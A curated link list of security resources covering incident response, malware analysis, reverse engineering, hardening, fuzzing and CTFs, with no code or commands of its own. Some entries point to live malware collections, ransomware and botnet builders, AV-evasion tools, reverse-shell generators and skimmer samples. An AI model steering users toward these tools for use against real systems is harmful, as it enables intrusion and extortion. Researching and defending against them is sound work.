Please contribute through pull requests ;)
Another great list: awesome-incident-response
- Nice list here by Cert.BR
- Practical Cryptography for Developers, github
- The Book of Secret Knowledge
- Security Engineering — Third Edition
- The Cyber Plumber's Handbook
- FIRST
- SANS Pen-Testing Resources: Downloads
- Some list of security projects
- APT & CyberCriminal Campaign Collection
- Applying DevOps Principles in Incident Response
- Encoding vs. Encryption vs. Hashing vs. Obfuscation
- Shodan: the world's first search engine for Internet-connected devices. Shodan 2000
- ATTACK-Tools: Utilities for MITRE™ ATT&CK
- hacking-tutorials
- crypto: Lecture notes for a course on cryptography
- tink: Tink is a multi-language, cross-platform library that provides cryptographic APIs that are secure, easy to use correctly, and hard(er) to misuse.
- SPLOITUS: Exploit search engine.
- Vulmon: Vulmon is a vulnerability search engine.
- CIS SecureSuite® Membership
- CRYPTO101: Crypto 101 is an introductory course on cryptography, freely available for programmers of all ages and skill levels.
- Pagerduty Incident Response: This documentation covers parts of the PagerDuty Incident Response process.
- security-training: Public version of PagerDuty's employee security training courses.
- incident-response-docs: PagerDuty's Incident Response Documentation.
- SMHasher is a test suite designed to test the distribution, collision, and performance properties of non-cryptographic hash functions. another repo
- CPDoS: Cache Poisoned Denial of Service
- CORS'ing a Denial of Service via cache poisoning
- global-irt: Global IRT (Incident Response Team) is a project to describe common IRT and abuse contact information
- cacao: OASIS CACAO TC: Official repository for work of the CACAO TC
- cti-documentation
- The 4th in the 5th: Temporal Aspects of Cyber Operations
- SOCless: The SOCless automation framework
- atc-react : A knowledge base of actionable Incident Response techniques
- Open CSIRT Foundation - SIM v3 Model and SIM3 Self Assessment.
- Global Forum on Cyber Expertise (GFCE).
- my-infosec-awesome.
- MD5 Decryption
- SHA-1 is a Shambles: First Chosen-Prefix Collision on SHA-1 and Application to the PGP Web of Trust
- Some CVEs stuff and links here and in here
- MikroTik search on shodan.
- TROMMEL: Sift Through Directories of Files to Identify Indicators That May Contain Vulnerabilities
- cve_manager: A python script that a) parses NIST NVD CVEs, b) processes and exports them to CSV files, c) creates a postgres database and imports all the data into it, d) provides query capabilities for this CVE database.
- dorkbot: Command-line tool to scan Google search results for vulnerabilities.
- Assembly Language / Reversing / Malware Analysis - resources
- Great online course by MalwareUnicorn
- Some other botnets list
- IKARUS anti.virus and its 9 exploitable kernel vulnerabilities
- Digital Certificates Used by Malware
- Signed Malware – The Dataset
- Malware Sample Sources for Researchers
- Indicators: Champing at the Cyberbit
- Limon - Sandbox for Analyzing Linux Malwares
- A Dynamic Binary Instrumentation framework based on LLVM
- Framework for building Windows malware, written in C++
- binary ninja
- Analyzing a New macOS DNS Hijacker: OSX/MaMi
- A PoC "malware" application with good intentions that aims to stress your anti-malware system: al-khaser
- Great analysis of mal100.evad.spre.rans.spyw.troj.winEXE@34/9@31/10
- Chaos: a Stolen Backdoor Rising Again
- Malware Indicators of Compromise (IOCs)
- Puszek: Yet another LKM rootkit for Linux. It hooks the syscall table.
- Joe Sandbox Cloud is a deep malware analysis platform which detects malicious files - API Wrapper.
- EternalGlue part two: A rebuilt NotPetya gets its first execution outside of the lab
- Malware web and phishing investigation by Decent Security.
- A collection of tools for working with TrickBot
- Forgot About Default Accounts? No Worries, GoScanSSH Didn’t
- RegRipper version 2.8 (source code)
- makin - reveal anti-debugging and anti-VM tricks.
- TESSERACT: Eliminating Experimental Bias in Malware Classification across Space and Time
- colental/byob: BYOB (Build Your Own Botnet), another byob
- Source Code for Exobot Android Banking Trojan Leaked Online
- Pegasus: analysis of network behavior
- Ramnit’s Network of Proxy Servers
- snake: a malware storage zoo
- A malware analysis kit for the novice
- malware-ioc: Indicators of Compromises (IOC) of our various investigations
- pftriage: Python tool and library to help analyze files during malware triage and analysis.
- imaginaryC2: Imaginary C2 is a python tool which aims to help in the behavioral (network) analysis of malware. Imaginary C2 hosts an HTTP server which captures HTTP requests towards selectively chosen domains/IPs. Additionally, the tool aims to make it easy to replay captured Command-and-Control responses/served payloads.
- When a malware is more complex than the paper.
- Vba2Graph: Generate call graphs from VBA code, for easier analysis of malicious documents.
- malwoverview: Malwoverview.py is a first response tool to perform an initial and quick triage on either a directory containing malware samples or a specific malware sample.
- SECT CTF 2018 :: Gh0st, More Smoked Leet Chicken
- What you need to know about “LoJax”—the new, stealthy malware from Fancy Bear
- Linux.Malware: Additional Material for the Linux Malware Paper
- PHP Malware Examination
- Analysis of Linux.Haikai: inside the source code
- Cylance vs. MBRKiller Wiper Malware.
- Deep Analysis of TrickBot New Module pwgrab
- multiscanner: Modular file scanning/analysis framework.
- FCL: FCL (Fileless Command Lines) - Known command lines of fileless malicious executions.
- Mac malware combines EmPyre backdoor and XMRig miner
- The Full Guide Understanding Fileless Malware Infections
- 'Injection' Without Injection
- Analysis of Neutrino Bot Sample (dated 2018-08-27): In this post I analyze a Neutrino Bot sample.
- pafish: Pafish is a demonstration tool that employs several techniques to detect sandboxes and analysis environments in the same way as malware families do.
- Thunderstrike2 details: This is the annotated transcript of our DefCon 23 / BlackHat 2015 talk, which presented the full details of Thunderstrike 2, the first firmware worm for Apple's Macs that can spread via both software or Thunderbolt hardware accessories and writes itself to the boot flash on the system's motherboard.
- Malboxes: a Tool to Build Malware Analysis Virtual Machines, github
- Triton is the world’s most murderous malware, and it’s spreading
- Cloak and Dagger — Mobile Malware Techniques Demystified
- IceBox: Icebox is a Virtual Machine Introspection solution that enables you to stealthily trace and debug any process (kernel or user). It's based on project Winbagility.
- Malware Development:
- Command and Control via TCP Handshake
- Joel Sandbox Analysis Report wdeQEksXgm
- emotet: Daily Emotet IoCs and Notes for 09/18/19
- Aleph: OpenSource /Malware Analysis Pipeline System
- Aleph: File Analysis Pipeline
- Anti-VM Technique with MSAcpi_ThermalZoneTemperature, powershell
- Burned Again by Flame 2.0
- AMSI as a Service — Automating AV Evasion: AMSI, the “AntiMalware Scan Interface”, has been around for some time. In a broad sense, it’s a component of Windows 10 which allows applications to integrate with AV products, though most people know it for its ability to make file-less malware visible to AV engines.
- A collection of x64dbg scripts. Feel free to submit a pull request to add your script.
- CAPA: The FLARE team's open-source tool to identify capabilities in executable files. capa-rules
- DRAKVUF Sandbox - automated hypervisor-level malware analysis system.
- Unprotect: The search engine about Malware Evasion Techniques
- HiJackThis Fork v3: A free utility that finds malware, adware and other security threats.
- FRITZFROG: A NEW GENERATION OF PEER-TO-PEER BOTNETS. detection script
- Tracking A Malware Campaign Through VT
- speakeasy: Windows kernel and user mode emulation.
- malware analysis and machine learning: If you are new to machine learning and want to start learning about building models to classify malware, I recommend the following
- GhostDNSbusters: Illuminating GhostDNS Infrastructure
- The Tetrade: Brazilian banking malware goes global
- Is macOS under the biggest malware attack ever?: EvilQuest/ThiefQuest malware.
- Hybrid Analysis
- MosaicRegressor: Lurking in the Shadows of UEFI. Technical details
- Evading Static Machine Learning Malware Detection Models – Part 1: The Black-Box Approach
- ember: The EMBER dataset is a collection of features from PE files that serve as a benchmark dataset for researchers.
- Complementary resources to follow the EHREM course by GoHacking (Malware Reverse Engineering)
- Coldfire: Golang malware development library
- pei, the PE Injector - Inject code on 32-bit and 64-bit PE executables
- Boa release is an experimental Javascript lexer, parser and compiler written in Rust.
- midrashim: x64 ELF infector written in Assembly
- New evasion techniques found in web skimmers
- digital skimming / #magecart technique for injecting convincing PayPal iframes into the checkout process. paypal endpoint called via cors-anywhere, stega-loader, paypal-cors-deob-good.js, paypal-cors-deob-with-comments.js, fake-paypal.html
- Automated Malware Analysis Report for D6pnpvG2z7 - Generated by Joe Sandbox
- Mac Malware
- virii: Collection of ancient computer virus source codes
- Detricking TrickBot Loader: TrickBot (TrickLoader) is a modular financial malware that first surfaced in October 2016. Almost immediately researchers noticed similarities with a credential-stealer called Dyre. It is still believed that those two families might’ve been developed by the same actor. decoder, tweet
- Analysis of Emotet v4
- Current Emotet Epoch 2 C2 as of 2019-09-26 07:54 US/Eastern
- abuse.ch Feodo Tracker Botnet C2 IP Blocklist
- simple_ransomware: this script isn't real ransomware; it just collects all your system files and encrypts them, so it can be considered a simple ransomware
- Mirai "Batkek"
- FinFisher Filleted 🐟, a triage of the FinSpy (macOS) malware
- the Emerald Connection: EquationGroup collaboration with Stuxnet
- Ryuk’s Return
- Ryuk Ransomware: Extensive Attack Infrastructure Revealed
- Android-Malware-Samples: Android Malware Samples
- Malware Samples: Malware samples and other artifacts
- A repository of LIVE malwares for your own joy and pleasure: theZoo
- malware.one is a binary substring searchable malware catalog containing terabytes of malicious code.
- Beginner Malware Reversing Challenges, by MalwareTech. repo
- MalwareWorld: Check for Suspicious Domains and IPs. Repo: MalwareWorld: System based on +500 blacklists and 5 external intelligences to detect potentially malicious internet hosts
- C2Matrix: The goal of this site is to point you to the best C2 framework for your needs based on your adversary emulation plan and the target environment
- LOLBITS: C2 framework that uses Background Intelligent Transfer Service (BITS) as communication protocol and Direct Syscalls + Dinvoke for EDR user-mode hooking evasion.
- MalwareBazaar: is a project from abuse.ch with the goal of sharing malware samples with the infosec community, AV vendors and threat intelligence providers.
- What is MWDB Core? mwdb-core: Malware repository component for samples & static configuration with REST API interface.
- Ransomware decryption tool
- Schroedinger’s Pet(ya)
- Player 3 Has Entered the Game: Say Hello to 'WannaCry'
- WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm
- Ransomware Overview
- Analyzing GrandSoft Exploit Kit and code
- Rapidly Evolving Ransomware GandCrab Version 5 Partners With Crypter Service for Obfuscation
- hidden-tear: It's a ransomware-like file crypter sample which can be modified for specific purposes.
- Tracking REvil: This blog describes our efforts in tracking the REvil ransomware and its affiliates for the past six months. REvil has been around since 2019 and is one of the top variants of ransomware causing havoc at many organizations around the globe ever since. The KPN Security Research Team was able to acquire C2 sinkholes allowing for the tracking of infections across the globe.
- After the ransom was paid, the attackers even provided some bonus security advice!
- Phirautee: A proof of concept crypto virus to spread user awareness about attacks and implications of ransomware. Phirautee is written purely using PowerShell and does not require any third-party libraries. This tool steals the information, holds an organisation’s data hostage for payments or permanently encrypts/deletes the organisation data.
- Sophisticated new Android malware marks the latest evolution of mobile ransomware
- Raccine: A Simple Ransomware Vaccine
- Brazilian Justice Court Ransomware: Another piece in the Puzzle
- Avast open-sources its machine-code decompiler
- Morris worm
- make a process unkillable?! (windows 10)
- Attack inception: Compromised supply chain within a supply chain poses new risks – Microsoft Secure.
- Curtis' Blog: Bypassing Next Gen AV During a Pentest
- Inception: Provides In-memory compilation and reflective loading of C# apps for AV evasion.
- Invoke-NeutralizeAV: Quick PoC I Wrote for Bypassing Next Gen AV Remotely for Pentesting.
- BinariesThatDoesOtherStuff.
- Circlean: USB key cleaner.
- The ELF Virus Writing HOWTO.
- mcreator: Encoded Reverse Shell Generator With Techniques To Bypass AVs.
- metame: a simple metamorphic code engine for arbitrary executables.
- rustdsplit: At some point, I learned about a method to perform a binary search on a file in order to identify its AV signature and change it to bypass signature-based AV. The tool I used back then is gone, so I wrote this.
- Virus Total API in Python
- IcedID Banking Trojan Shares Code with Pony 2.0 Trojan
- Turla: In and out of its unique Outlook backdoor
- QMKhuehuebr: Trying to hack into keyboards
- “VANILLA” malware: vanishing antiviruses by interleaving layers and layers of attacks
- A Mix of Python & VBA in a Malicious Word Document
- MalwareAnalysisForHedgehogs: Throw your bat cape over your spikes and get started with malware analysis and reverse engineering. I work as a malware analyst and like to share my knowledge.
- 2020-10-22 - TRAFFIC ANALYSIS EXERCISE - OMEGACAST
- EMOTET: EMOTET INFECTIONS WITH ZEUS PANDA BANKER AND TRICKBOT (GTAG: DEL34)
- (pt-br) Fundamentals of Reverse Engineering.
- Dangers of the Decompiler
- RE guide for beginners: Methodology and tools
- REDasm: Crossplatform, interactive, multiarchitecture disassembler
- Reversing ARM Binaries
- Programmer De-anonymization from Binary Executables
- syntia: Program synthesis based deobfuscation framework for the USENIX 2017 paper "Syntia: Synthesizing the Semantics of Obfuscated Code"
- Reverse engineering WhatsApp Web
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- BOLO: Reverse Engineering — Part 2 (Advanced Programming Concepts)
- Reverse Engineering for Beginners
- VivienneVMM: VivienneVMM is a stealthy debugging framework implemented via an Intel VT-x hypervisor.
- Xori: Custom disassembly framework
- rattle: Rattle is an EVM binary static analysis framework designed to work on deployed smart contracts.
- starshipraider: High performance embedded systems debug/reverse engineering platform
- GBA-IDA-Pseudo-Terminal: IDAPython tools to aid with analysis, disassembly and data extraction using IDA python commands, tailored for the GBA architecture at some parts
- binja-ipython: A plugin to integrate an IPython kernel into Binary Ninja.
- PySameSame: This is a python version of samesame repo to generate homograph strings
- Reversing a Japanese Wireless SD Card From Zero to Code Execution
- Practical-Reverse-Engineering-using-Radare2: Training Materials of Practical Reverse Engineering using Radare2
- IDA Pro:
- idaemu: idaemu is an IDA Pro Plugin - use for emulating code in IDA Pro.
- lighthouse: Code Coverage Explorer for IDA Pro & Binary Ninja
- IDAPro Cheat Sheet
- LIEF: Library to Instrument Executable Formats (github)
- pwndbg: Exploit Development and Reverse Engineering with GDB Made Easy
- DEBIN: Predicting Debug Information in Stripped Binaries
- Analyzing ARM Cortex-based MCU firmwares using Binary Ninja
- Manticore: Symbolic Execution Tool For Analysis Of Binaries And Smart Contracts. manticore: Symbolic execution tool
- Beam me up, CFG.: Earlier in 2018 while revisiting the Delay Import Table, I used dumpbin to check the Load Configuration data of a file and noticed new fields in it. And at the time of writing this, more fields were added! The first, CFGuard, caught my attention and I learned about Control Flow Guard, a new security feature. To put it simply, it protects the execution flow from redirection - for example, from exploits that overwrite an address in the stack. Maybe they should call it the Security Directory instead.
- Getting Started with Frida Tools
- Frida hooking Android: part 1, part 2, part 3, part 4 and part 5
- PBA - Analysis Tools: My own versions from the programs of the book "Practical Binary Analysis"
- functrace: a tool that helps to analyze a binary file with dynamic instrumentation using DynamoRIO
- Signature-Base: signature-base is the signature database for my scanners LOKI and SPARK Core.
- Generic Anomalies: Detects an embedded executable in a non-executable file
- Virtuailor: IDAPython tool for C++ vtables reconstruction.
- Linux Reverse Engineering CTFs for Beginners.
- execution-trace-viewer: Tool for viewing and analyzing execution traces
- Reverse Engineering of a Not-so-Secure IoT Device
- Python for Reverse Engineering 1: ELF Binaries
- Kaitai Struct: A new way to develop parsers for binary structures.
- findLoop: find possible encryption/decryption or compression/decompression code.
- Reverse Engineering 'A Link to the Past (GBA)' ep 1
- wiggle: A concept self-hosted executable binary search engine.
- uncompyle6: A cross-version Python bytecode decompiler
- Decompyle++: C++ python bytecode disassembler and decompiler
- Reverse engineering Go binaries using Radare 2 and Python
- bearparser
- EFISwissKnife: An IDA plugin to improve (U)EFI reversing.
- Reverse-engineering precision op amps from a 1969 analog computer
- CPU Adventure – Unknown CPU Reversing: We reverse-engineered a program written for a completely custom, unknown CPU architecture, without any documentation for the CPU (no emulator, no ISA reference, nothing) in the span of ten hours. Read on to find out how we did it…
- pev: pev is a full-featured, open source, multiplatform command line toolkit to work with PE (Portable Executables) binaries.
- PEDA: Python Exploit Development Assistance for GDB.
- Sourcetrail: free and open-source cross-platform source explorer.
- Qiling Framework: Qiling Advanced Binary Emulation Framework. repo
- Glasgow Debug Tool: Scots Army Knife for electronics
- Tales Of Binary Deobfuscation - Part 1
- evilquest_deobfuscator: EvilQuest/ThiefQuest malware strings decrypter/deobfuscator. evilquest_stats: Small utility to hash EvilQuest code and cstrings sections.
- mona (site): a python script that can be used to automate and speed up specific searches while developing exploits (typically for the Windows platform). It runs on Immunity Debugger and WinDBG, and requires python 2.7. Although it runs in WinDBG x64, the majority of its features were written specifically for 32bit processes.
- windbglib: Public repository for windbglib, a wrapper around pykd.pyd (for Windbg), used by mona.py
- VX Underground
- MalwareSourceCode: Collection of malware source code for a variety of platforms in an array of different programming languages.
- VXUG-Papers: Research code & papers from members of vx-underground.
- (pt-br) How to automatically attach a process to a debugger.
- HyperDbg Debugger: The Source Code of HyperDbg Debugger
- The HT Editor: A file editor/viewer/analyzer for executables.
- XLMMacroDeobfuscator: Extract and Deobfuscate XLM macros (a.k.a Excel 4.0 Macros)
- decompile_java, using CFR - another java decompiler.
- NoVmp: A static devirtualizer for VMProtect x64 3.x powered by VTIL.
- Awesome IDA, x64DBG & OllyDBG plugins: A curated list of IDA x64DBG and OllyDBG plugins.
- Yara-Rules: Repository of yara rules
- Repository containing Indicators of Compromise and Yara rules
- YARA in a nutshell
- yara: The pattern matching swiss knife
- mkYARA: Writing YARA rules for the lazy analyst (github)
- Yara-Rules: Repository of YARA rules made by McAfee ATR Team.
- ReversingLabs YARA Rules
- YaraHunts: Random hunting-oriented yara rules
- YARA Rules for ProcFilter
- ThreatHunting
- yara-validator: Validates yara rules and tries to repair the broken ones.
- Vim Syntax Highlighting for YARA Rules: A Vim syntax-highlighting file for YARA rules covering YARA 4.0
- ghidra-firmware-utils: Ghidra utilities for analyzing firmware
- dragondance: Binary code coverage visualizer plugin for Ghidra
- Decompiler Analysis Engine: Welcome to the Decompiler Analysis Engine. It is a complete library for performing automated data-flow analysis on software, starting from the binary executable.
- Working With Ghidra's P-Code To Identify Vulnerable Function Calls
- GhIDA: Ghidra decompiler for IDA Pro.
- Ghidraaas: Ghidra as a Service
- SVD-Loader for Ghidra: Simplifying bare-metal ARM reverse engineering. repo
- GhidraX64Dbg: Extract annotations from Ghidra into an X32/X64 dbg database.
- Reverse Engineering Go Binaries with Ghidra
- Introduction to Reverse Engineering with Ghidra: A Four Session Course
- Inject code into running Python processes
- malspider: Malspider is a web spidering framework that detects characteristics of web compromises.
- AIL-framework: AIL framework - Analysis Information Leak framework
- Did Microsoft Just Manually Patch Their Equation Editor Executable? Why Yes, Yes They Did. (CVE-2017-11882)
- 9 Kubernetes Security Best Practices Everyone Must Follow
- BlueWars: Defensive Capture The Flag that took place at H2HC
- CCAT: Cisco Config Analysis Tool
- Ciderpress: Hardened wordpress installer
- debian-cis: PCI-DSS compliant Debian 7/8 hardening.
- Endlessh: an SSH tarpit.
- ERNW Repository of Hardening Guides: This repository contains various hardening guides compiled by ERNW for various purposes.
- fero: YubiHSM2-backed signing server
- FirewallChecker: A self-contained firewall checker
- Get SSH login notification on Telegram
- Hardentools is a utility that disables a number of risky Windows features.
- How To Secure A Linux Server: An evolving how-to guide for securing a Linux server.
- Implementing Least-Privilege Administrative Models
- Iptables Essentials: Common Firewall Rules and Commands.
- iptables-essentials: Iptables Essentials: Common Firewall Rules and Commands.
- kconfig-hardened-check: A tool for checking the hardening options in the Linux kernel config
- Keyringer: encrypted and distributed secret sharing software
- Keystone Project. Github: Keystone Enclave
- linux-hardened: Minimal supplement to upstream Kernel Self Protection Project changes.
- List of sites with two factor auth
- nftables: nftables is the successor to iptables. It replaces the existing iptables, ip6tables, arptables and ebtables framework. It uses the Linux kernel and a new userspace utility called nft. nftables provides a compatibility layer for the ip(6)tables framework.
- Nice article with a lot of resources: Common approaches to securing Linux servers and what runs on them.
- opmsg: a replacement for gpg which can encrypt/sign/verify your mails or create/verify detached signatures of local files. Even though the opmsg output looks similar, the concept is entirely different.
- prowler: AWS Security Best Practices Assessment, Auditing, Hardening and Forensics Readiness Tool. It follows guidelines of the CIS Amazon Web Services Foundations Benchmark and additional checks. Official CIS for AWS guide.
- reconbf: Recon system hardening scanner
- Sarlacc is an SMTP server that I use in my malware lab to collect spam from infected hosts.
- Secure & Ad-free Internet Anywhere With Streisand and Pi Hole
- Secure Secure Shell by stribika
- Securing Docker Containers. The Docker Bench for Security is a script that checks for dozens of common best-practices around deploying Docker containers in production.
- securityonion-docs
- security.txt: A proposed standard which allows websites to define security policies.
- See your site config with Hardenize
- Set up two-factor authentication for SSH on Fedora
- solo-hw: Hardware sources for Solo
- ssh-auditor: The best way to scan for weak ssh passwords on your network
- Streisand sets up a new server running your choice of WireGuard, OpenConnect, OpenSSH, OpenVPN, Shadowsocks, sslh, Stunnel, or a Tor bridge. It also generates custom instructions for all of these services. At the end of the run you are given an HTML file with instructions that can be shared with friends, family members, and fellow activists.
- The Practical Linux Hardening Guide: 🔥 This guide details the planning and the tools involved in creating secure Linux production systems - work in progress.
- tls-what-can-go-wrong: TLS - what can go wrong?
- upvote: A multi-platform binary whitelisting solution
- Using a Hardened Container Image for Secure Applications in the Cloud
- Zero-knowledge attestation
- RHEL Like systems:
- CentOS7 Lockdown
- RHEL7-CIS: Ansible RHEL 7 - CIS Benchmark Hardening Script
- cisecurity: Configures Linux systems to Center for Internet Security Linux hardening standard.
- bdshemu: The Bitdefender shellcode emulator
- IPv6 Security Best Practices
- auditd: Best Practice Auditd Configuration.
- A lot of good posts by geek flare:
- CaCerts
- List of free rfc3161 servers. TSA Servers
- certstream-server: Certificate Transparency Log aggregation, parsing, and streaming service written in Elixir
- Apache:
- Apache Security by Ivan Ristić
- dotdotslash: A tool to help you search for Directory Traversal Vulnerabilities
- A new security header: Feature Policy
- How do I prevent apache from serving the .git directory?
- Nginx:
- 20 Essential Things to Know if You’re on Nginx Web Server
- Nginx C function: Create your desired C application on top of nginx module
- NGINX config for SSL with Let's Encrypt certs
- How to Configure Nginx SSL Certificate Chain
- PHP:
- Cheatsheet for finding vulnerable PHP code using grep: This will assist you in the finding of potentially vulnerable PHP code. Each type of grep command is categorized in the type of vulnerabilities you generally find with that function.
- snuffleupagus: Security module for php7 - Killing bugclasses and virtual-patching the rest!
- FOPO-PHP-Deobfuscator: A simple script to deobfuscate PHP file obfuscated with FOPO Obfuscator
- Decode.Tools: Decode PHP Obfuscator by FOPO
- CAA Mandated by CA/Browser Forum
- ENVOY is an open source edge and service proxy, designed for cloud-native applications. code
- ghp: A simple web server for serving static GitHub Pages locally
- LEAR: Linux Engine for Asset Retrieval
- NFHTTP: A cross platform C++ HTTP library that interfaces natively to other platforms.
- Security/Server Side TLS by Mozilla
- urlscan.io: A sandbox for the web
- Search if your credentials were leaked: Cr3dOv3r
- pw-pwnage-cfworker: Deploy a Cloudflare Worker to sanely score users' new passwords with zxcvbn AND check for matches against haveibeenpwned's 5.1+ billion breached accounts
- XSS Exploit code for retrieving passwords stored in a Password Vault
- login_duress: A BSD authentication module for duress passwords
- XSStrike: Most advanced XSS detection suite.
- Was my password leaked? pwndb: Search for credentials leaked on pwndb.
- bitwarden_rs: Unofficial Bitwarden compatible server written in Rust
- pcfg_cracker: Probabilistic Context Free Grammar (PCFG) password guess generator
- Use YubiKey security key to sign into AWS Management Console with YubiKey for multi-factor authentication
- Introducing the Qubes U2F Proxy
- YubiKey-Guide: Guide to using YubiKey for GPG and SSH
- Using a Yubikey for GPG and SSH: Sebastian Neef - 0day.work
- PIN and Management Key
- Improve login security with challenge-response authentication
- URU Card: Arduino FIDO2 Authenticator. uru-card
- YubiKey at Datadog
- This is a practical guide to using YubiKey as a SmartCard for storing GPG encryption and signing keys.
- yubikey-ssh-setup
- Hardening C/C++ Programs Part II: Executable-Space Protection and ASLR
- Checklist of the most important security countermeasures when designing, testing, and releasing your API
- sanitizers
- Gitian is a secure source-control oriented software distribution method.
- Canary:Input Detection and Response
- Canarytokens by Thinkst, Quick, Free, Detection for the Masses
- CANARY FILES: GENERATING FAKE FILES TO DETECT CRITICAL DATA LOSS FROM COMPLEX COMPUTER NETWORKS
- How to Know if Someone Access your Files with Canary Tokens
- Wycheproof: Project Wycheproof tests crypto libraries against known attacks.
- Web App Security 101: Keep Calm and Do Threat Modeling
- SSL/TLS for dummies:
- heaphopper: HeapHopper is a bounded model checking framework for Heap-implementations
- Ristretto is a technique for constructing prime order elliptic curve groups with non-malleable encodings.
- SEI CERT C Coding Standard: The C rules and recommendations in this wiki are a work in progress and reflect the current thinking of the secure coding community. Because this is a development website, many pages are incomplete or contain errors. As rules and recommendations mature, they are published in report or book form as official releases. These releases are issued as dictated by the needs and interests of the secure software development community.
- Safe C Library: The Safe C Library provides bound checking memory and string functions per ISO/IEC TR24731. These functions are alternative functions to the existing standard C library that promote safer, more secure programming.
- Field Experience With Annex K — Bounds Checking Interfaces
- TSLint: An extensible linter for the TypeScript language.
- rubocop: A Ruby static code analyzer and formatter, based on the community Ruby style guide.
- Librando: transparent code randomization for just-in-time compilers
- Checked C: Making C Safe by Extension. github
- Practical case: Buffer Overflow 0x01
- pigaios: A tool for diffing source codes directly against binaries. slides
- A Git Horror Story: Repository Integrity With Signed Commits. How to use git securely (signing commits)
- An Introduction to Dynamic Symbolic Execution and the KLEE Infrastructure
- Tooling for verification of PGP signed commits
- tlse: Single C file TLS 1.2/1.3 implementation, using tomcrypt as crypto library
- tinyalloc: malloc / free replacement for unmanaged, linear memory situations (e.g. WASM, embedded devices...)
- Sandboxed API: Sandboxed API automatically generates sandboxes for C/C++ libraries
- HACL*: a formally verified cryptographic library written in F*
- Villoc: Villoc is a heap visualisation tool, it's a python script that renders a static html file.
- How C array sizes become part of the binary interface of a library
- MazuCC: A minimalist C compiler with x86_64 code generation
- When the going gets tough: Understanding the challenges with Product commoditization in SCA.
- huskyCI: huskyCI is an open source tool that performs security tests inside CI pipelines of multiple projects and centralizes all results into a database for further analysis and metrics.
- (pt-br) GTER 47 | GTS 33 - Day 2 (part 1): nice talk by Daniel Carlier and Silvia Pimpão.
- HTTP Security Headers - A Complete Guide
- SAFECode: is a non-profit organization exclusively dedicated to increasing trust in information and communications technology products and services through the advancement of effective software assurance methods.
- Security Code Review 101
- Elliptic Curve Cryptography Explained
- Cheatsheet for finding vulnerable PHP code using grep: This will assist you in the finding of potentially vulnerable PHP code. Each type of grep command is categorized in the type of vulnerabilities you generally find with that function.
- How to Process Passwords as a Software Developer
- QL: The libraries and queries that power CodeQL and LGTM.com
- Sendy is Insecure: How Not to Implement reCAPTCHA
- Win10 Crypto Vulnerability: Cheating in Elliptic Curve Billiards 2
- DevSecOps: Securing Software in a DevOps World
- GitGuardian Documentation and Resources: Resources to help you keep secrets (API keys, database credentials, certificates, ...) out of source code and remediate the issue in case of a leaked API key. Made available by GitGuardian. python API Client
- Vuln Cost - Security Scanner for VS Code: Find security vulnerabilities in open source npm packages while you code.
- Most Popular Analysis Tools by Programming Language
- Deepsource: tool that analyzes your repository.
- git-wild-hunt: A tool to hunt for credentials in github wild AKA git*hunt
- shhgit: Ah shhgit! Find GitHub secrets in real time
- A Graduate Course in Applied Cryptography
- KaiMonkey: Vulnerable Terraform Infrastructure. KaiMonkey provides example vulnerable infrastructure to help cloud security, DevSecOps and DevOps teams explore and understand common cloud security threats exposed via infrastructure as code.
- OWASP Broken Web Applications Project. OWASP BWA repository files.
- dvna: Damn Vulnerable NodeJS Application
- Static analysis powered security scanner for your terraform code
- Scan (skæn) is a free open-source security audit tool for modern DevOps teams. sast-scan: A Free & Open Source DevSecOps Platform.
- secDevLabs: A laboratory for learning secure web development in a practical manner.
- Security impact of a misconfigured CORS implementation
- Which Security Risks Do CORS Imply?
- Cross-Origin Resource Sharing (CORS)
- Secure Modular Runtimes
- WebSecurity Academy
- OWASP Node js Goat Project, repo
- Prototype pollution – and bypassing client-side HTML sanitizers
- Understanding the CSRF Vulnerability (A Beginner’s Guide)
- VulnyCode: PHP Code Static Analysis. Python script to detect vulnerabilities inside PHP source code using static analysis, based on regex
- OWASP Web Security Testing Guide: The Web Security Testing Guide is a comprehensive Open Source guide to testing the security of web applications and web services. portal
- A Formal Analysis of IEEE 802.11's WPA2: Models and Proofs. paper/video
- SCYTHE's Community Threats Repository: Share SCYTHE threats with the community. #ThreatThursday adversary emulation plans will be shared here.
- Generating Software Tests (github)
- afl-unicorn: Fuzzing Arbitrary Binary Code
- Regaxor: A regular expression fuzzer
- BrokenType: TrueType and OpenType font fuzzing toolset
- Dizzy-legacy: Network and USB protocol fuzzing toolkit.
- Start-Hollow.ps1: My musings with PowerShell
- auditd-attack: A Linux Auditd rule set mapped to MITRE's Attack Framework
- BFuzz: Fuzzing Browsers
- Structure-Aware Fuzzing with libFuzzer with fuzzer test suite
- Fuzzilli: A JavaScript Engine Fuzzer.
- Materials from Fuzzing Bay Area meetups.
- javafuzz: Javafuzz is coverage-guided fuzzer for testing Java packages.
- onefuzz: A self-hosted Fuzzing-As-A-Service platform.
- Fuzzing Like A Caveman 3: Trying to Somewhat Understand The Importance Code Coverage
- ffuf: Fast web fuzzer written in Go
- RESTler finds security and reliability bugs through automated fuzzing. RESTler is the first stateful REST API fuzzing tool for automatically testing cloud services through their REST APIs and finding security and reliability bugs in these services. REST API Fuzz Testing (RAFT): source code for the self-hosted service developed for Azure, including the API, orchestration engine, and default set of security tools (including MSR's RESTler), that enables developers to embed security tooling into their CI/CD workflows.
- The Web API Checklist: 43 Things To Think About When Designing, Testing, and Releasing your API
- API-Security-Checklist: Checklist of the most important security countermeasures when designing, testing, and releasing your API
- REST API Checklist
- Your Comprehensive Web API Design Checklist
- API Security Testing: Rules And Checklist
- API Security Testing - How to Hack an API and Get Away with It
- API Security Checklist: Checklist of the most important security countermeasures when designing, testing, and releasing your API
- Istio: An open platform to connect, manage, and secure microservices.
- How to contact Google SRE: Dropping a shell in cloud SQL
- hack-requests: The hack-requests is an http network library for hackers
- REST API Testing Tutorial: Sample Manual Test Case
- REST Security Cheat Sheet: CheatSheetSeries
- Penetration Testing RESTful Web Services
- RESTful web services penetration testing
- Astra: Automated Security Testing for REST APIs
- bad_json_parsers: Exposing problems in json parsers of several programming languages.
- The fast, easy, and affordable way to train your hacking skills.
- Write-ups for crackmes and CTF challenges by eleemosynator
- pwntools: CTF framework and exploit development library
- google-ctf
- Pwn2Win 2018. unsolved
- Leap Security
- 35c3ctf-challs
- ctf-tasks: An archive of low-level CTF challenges developed over the years.
- $50 million CTF Writeup.
- Alice sent Bob a meme - UTCTF 2019. tl;dr: extract data from the given images using binwalk, transform the given diophantine equation into a cubic curve and retrieve the EC parameters, then solve the ECDLP given in the extracted data using the Pohlig-Hellman algorithm.
